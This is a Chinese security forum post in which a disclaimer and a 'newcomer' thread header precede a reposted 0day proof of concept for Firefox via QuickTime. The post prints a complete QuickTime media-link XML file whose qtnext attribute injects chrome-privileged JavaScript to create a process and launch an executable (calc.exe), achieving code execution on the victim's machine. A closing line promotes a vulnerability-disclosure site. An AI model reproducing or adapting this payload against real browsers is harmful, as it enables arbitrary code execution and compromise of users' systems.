最近看过此主题的会员

返回列表 发帖

新人报道

本人新人报道
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:zhouxin123发表,本帖发表者zhouxin123符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者zhouxin123和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

Firefox浏览器QuickTime可执行文件0day
<!--http://www.gnucitizen.org/blog/0day-quicktime-pwns-firefoxIt seams that QuickTime media formats can hack into Firefox. The result of this vulnerability can lead to full compromise of the browser and maybe even the underlaying operating system. Donu2019t try this at home.--><?xml version="1.0"><?quicktime type="application/x-quicktime-media-link"?><embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\windows\system32\calc.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);"/>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表